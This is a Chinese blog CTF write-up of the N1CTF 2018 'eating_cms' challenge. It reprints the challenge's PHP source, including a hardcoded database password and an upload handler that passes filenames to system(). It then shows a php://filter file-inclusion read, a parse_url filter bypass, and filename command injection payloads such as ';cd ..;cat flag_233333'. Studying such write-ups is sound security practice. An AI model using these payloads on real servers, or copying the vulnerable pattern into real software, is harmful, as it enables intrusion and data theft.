首页 > 其他分享 >[N1CTF 2018]eating_cms 1

[N1CTF 2018]eating_cms 1

时间:2024-07-17 14:40:13浏览次数:9  
标签:do eating N1CTF res user sql query php cms

信息收集,文件上传,rce,代码审计


打开之后是一个登录页面,同时他的url是login,呢么第一反应应该是看看有没有register.php发现是有的,..

但是admin是注册不了的,呢么我们先随机注册一个尝试看看能不能更改权限,

登陆上之后发现是没有session的也就是目前没办法切换admin账号,但是url可以看出,这里可能存在文件包含之类的,
测试之后发现是有文件包含在里的用伪协议读取

/user.php?page=php://filter/convert.base64-encode/resource=index

index.php

<?php
require_once "function.php";
if(isset($_SESSION['login'] )){
    Header("Location: user.php?page=info");
}
else{
    include "templates/index.html";
}
?

function.php

<?php
session_start();
require_once "config.php";
function Hacker()
{
    Header("Location: hacker.php");
    die();
}


function filter_directory()
{
    $keywords = ["flag","manage","ffffllllaaaaggg"];
    $uri = parse_url($_SERVER["REQUEST_URI"]);
    parse_str($uri['query'], $query);
//    var_dump($query);
//    die();
    foreach($keywords as $token)
    {
        foreach($query as $k => $v)
        {
            if (stristr($k, $token))
                hacker();
            if (stristr($v, $token))
                hacker();
        }
    }
}

function filter_directory_guest()
{
    $keywords = ["flag","manage","ffffllllaaaaggg","info"];
    $uri = parse_url($_SERVER["REQUEST_URI"]);
    parse_str($uri['query'], $query);
//    var_dump($query);
//    die();
    foreach($keywords as $token)
    {
        foreach($query as $k => $v)
        {
            if (stristr($k, $token))
                hacker();
            if (stristr($v, $token))
                hacker();
        }
    }
}

function Filter($string)
{
    global $mysqli;
    $blacklist = "information|benchmark|order|limit|join|file|into|execute|column|extractvalue|floor|update|insert|delete|username|password";
    $whitelist = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'(),_*`-@=+><";
    for ($i = 0; $i < strlen($string); $i++) {
        if (strpos("$whitelist", $string[$i]) === false) {
            Hacker();
        }
    }
    if (preg_match("/$blacklist/is", $string)) {
        Hacker();
    }
    if (is_string($string)) {
        return $mysqli->real_escape_string($string);
    } else {
        return "";
    }
}

function sql_query($sql_query)
{
    global $mysqli;
    $res = $mysqli->query($sql_query);
    return $res;
}

function login($user, $pass)
{
    $user = Filter($user);
    $pass = md5($pass);
    $sql = "select * from `albert_users` where `username_which_you_do_not_know`= '$user' and `password_which_you_do_not_know_too` = '$pass'";
    echo $sql;
    $res = sql_query($sql);
//    var_dump($res);
//    die();
    if ($res->num_rows) {
        $data = $res->fetch_array();
        $_SESSION['user'] = $data[username_which_you_do_not_know];
        $_SESSION['login'] = 1;
        $_SESSION['isadmin'] = $data[isadmin_which_you_do_not_know_too_too];
        return true;
    } else {
        return false;
    }
    return;
}

function updateadmin($level,$user)
{
    $sql = "update `albert_users` set `isadmin_which_you_do_not_know_too_too` = '$level' where `username_which_you_do_not_know`='$user' ";
    echo $sql;
    $res = sql_query($sql);
//    var_dump($res);
//    die();
//    die($res);
    if ($res == 1) {
        return true;
    } else {
        return false;
    }
    return;
}

function register($user, $pass)
{
    global $mysqli;
    $user = Filter($user);
    $pass = md5($pass);
    $sql = "insert into `albert_users`(`username_which_you_do_not_know`,`password_which_you_do_not_know_too`,`isadmin_which_you_do_not_know_too_too`) VALUES ('$user','$pass','0')";
    $res = sql_query($sql);
    return $mysqli->insert_id;
}

function logout()
{
    session_destroy();
    Header("Location: index.php");
}

?>

config.php

<?php
error_reporting(E_ERROR | E_WARNING | E_PARSE);
define(BASEDIR, "/var/www/html/");
define(FLAG_SIG, 1);
$OPERATE = array('userinfo','upload','search');
$OPERATE_admin = array('userinfo','upload','search','manage');
$DBHOST = "localhost";
$DBUSER = "root";
$DBPASS = "Nu1LCTF2018!@#qwe";
//$DBPASS = "";
$DBNAME = "N1CTF";
$mysqli = @new mysqli($DBHOST, $DBUSER, $DBPASS, $DBNAME);
if(mysqli_connect_errno()){
        echo "no sql connection".mysqli_connect_error();
        $mysqli=null;
        die();
}
?

hacker.php

<?php
    include("templates/hacker.html");
?>

然后这里不难发现是由flag的信息的,

也就是说我们可能要去读取呢个和flag有关的文件,但是这里有个parse_url() parse_str()这两个函数这个我也查到过相关资料,这里就直接给大家绕过方法

//user.php?page=php://filter/convert.base64-encode/resource=ffffllllaaaaggg

可以发现读到了flag相关文件
ffffllllaaaaggg.php

<?php
if (FLAG_SIG != 1){
    die("you can not visit it directly");
}else {
    echo "you can find sth in m4aaannngggeee";
}
?>

m4aaannngggeee.php

<?php
if (FLAG_SIG != 1){
    die("you can not visit it directly");
}
include "templates/upload.html";

?>

然后发现给我们了一个upload的网页,我们尝试访问一下

发现是有一个文件上传的
这样的话我们就可以去尝试上传文件

可以在报错中发现这是有一个php文件的我们尝试去读取他的源码
和刚刚的方法是一样的
upllloadddd.php

<?php
$allowtype = array("gif","png","jpg");
$size = 10000000;
$path = "./upload_b3bb2cfed6371dfeb2db1dbcceb124d3/";
$filename = $_FILES['file']['name'];
if(is_uploaded_file($_FILES['file']['tmp_name'])){
    if(!move_uploaded_file($_FILES['file']['tmp_name'],$path.$filename)){
        die("error:can not move");
    }
}else{
    die("error:not an upload file!");
}
$newfile = $path.$filename;
echo "file upload success<br />";
echo $filename;
$picdata = system("cat ./upload_b3bb2cfed6371dfeb2db1dbcceb124d3/".$filename." | base64 -w 0");
echo "<img src='data:image/png;base64,".$picdata."'></img>";
if($_FILES['file']['error']>0){
    unlink($newfile);
    die("Upload file error: ");
}ext = array_pop(explode(".",$_FILES['file']['name']));
if(!in_array($ext,$allowtype)){
    unlink($newfile);
}
?>

这里就有个很明显的漏洞了

$picdata = system("cat ./upload_b3bb2cfed6371dfeb2db1dbcceb124d3/".$filename." | base64 -w 0");

发现他会对我们的文件名进行命令执行,然后进行输出可以看到他是对前后进行拼接的,如果我们在这里传入;给分割开,呢么我们就相当于拿到了shell
但是在这直接上传文件发现是假的,呢既然这样的话呢我们不妨尝试去url一下我们之前的文件发现manager有东西

可能真正的位置在这里
继续尝试上传

;ls


发现是爆装备了

之后我们尝试ls /发现被绊了ls ../也不行,呢么我们只能先进行目录穿越了

;cd ..;ls

;cd ..;cat flag_233333


得到flag

标签:do,eating,N1CTF,res,user,sql,query,php,cms
From: https://www.cnblogs.com/z2gh/p/18307337

相关文章

  • 易优CMS根据aid获取文档页面链接
    使用sql等标签获取到文档信息,但是没有获取到文档页面的链接,可以使用以下方法生成。1、在根目录下\extend\function.php中创建方法:if(!function_exists('diy_get_arcurl')){/***获取前台文档的URL*@paraminteger$aid文档ID*@paraminteger......
  • 易优CMS模板标签tags标签调用
    【基础用法】标签:tags描述:TAG调用用法:{eyou:tagssort='now'getall='0'loop='100'}<ahref='{$field.link}'>{$field.tag}</a>(文档数:{$field.total}){/eyou:tags}属性:aid=''文档ID,在内容页可以不设置该属性typeid=''栏......
  • 易优cms apache服务器伪静态规则
    易优cms在apache服务器环境默认自动隐藏index.php入口。如果发现没隐藏,可以检查根目录.htaccess是否含有以下红色代码段: <IfModule mod_rewrite.c>Options +FollowSymlinks -MultiviewsRewriteEngine on#http跳转到https#RewriteCond %{HTTPS} !=on#RewriteRule ^......
  • 帝国CMS网站后台对已增加的信息进行批量删除
    (一)、登录后台,单击“栏目”菜单,选择“批量删除信息”子菜单,进入批量删除信息界面: (二)、进入批量删除信息界面:选择数据表选择要删除信息的表。选择栏目选择要删除信息的栏目。按时间删除设置删除某一时间段的信息。按ID删除设置删除某一ID......
  • 易优cms广告管理栏目里面我删除了一个广告。网站没有了,怎么添加
    在广告管理中新增广告新建广告组,上传相应的图片保存,确认提交。根据实际情况,调用广告组或者单独的图片标签 找到相应文档,你的网站文章页广告被删,那就打开templatepcview_article.htm文件,找到第21行左右的下面这句代码,修改新增的图片ID,比如新增的id6......
  • 帝国CMS网站对前台会员的帐号进行批量删除
    一、登录后台,单击“用户”菜单,选择“批量清理会员”子菜单,进入批量清理会员界面: 二、进入批量清理会员界面:用户名包含字符删除用户名包含此字符的会员,空为不限。邮箱地址包含字符删除邮箱地址包含此字符的会员,空为不限。用户ID介于删除用户ID......
  • DedeCMS网站模板的title、description、keywords应该怎么写?
    首页​<title>{dede:global.cfg_webname/}-{dede:global.cfg_websubtitle/}</title><metaname="description"content="{dede:global.cfg_description/}"><metaname="keywords"content="{dede:global.cfg_k......
  • 易优CMS模板标签articlepay文章付费
      [基础用法]  标签:articlepay   描述:文章模型实现文章付费阅读,会员专享,会员付费,在使用之前先在文章模型开启付费阅读  属性:   aid=''文档id   id=''可以任意指定循环里的变量名替代c_field,假设id='c_field',模板调用如:{$c_field.hidden}变成 {$c_fiel......
  • 帝国CMS的点击显示验证码如何调用?
    帝国CMS的点击显示验证码如何调用?1、显示页面要加载/e/data/js/ajax.js文件,即加:<scriptsrc="/e/data/js/ajax.js"></script>2、显示验证码用:<divid="V变量名showkey"><ahref="#EmpireCMS"onclick="edoshowkey('V变量名showkey','......
  • 网站源码软件公司pbootcms模板网页设计主题
    软件公司的网站设计分享我很高兴向大家介绍我刚刚制作的软件公司的网站设计。友好的站点界面,是打动访客的第一步。软件公司网站主题网站设计通常旨在展示公司的专业性、技术实力以及服务优势。以下是对软件公司网站主题设计的介绍,分为几个关键部分进行阐述:整体设计风格:简洁......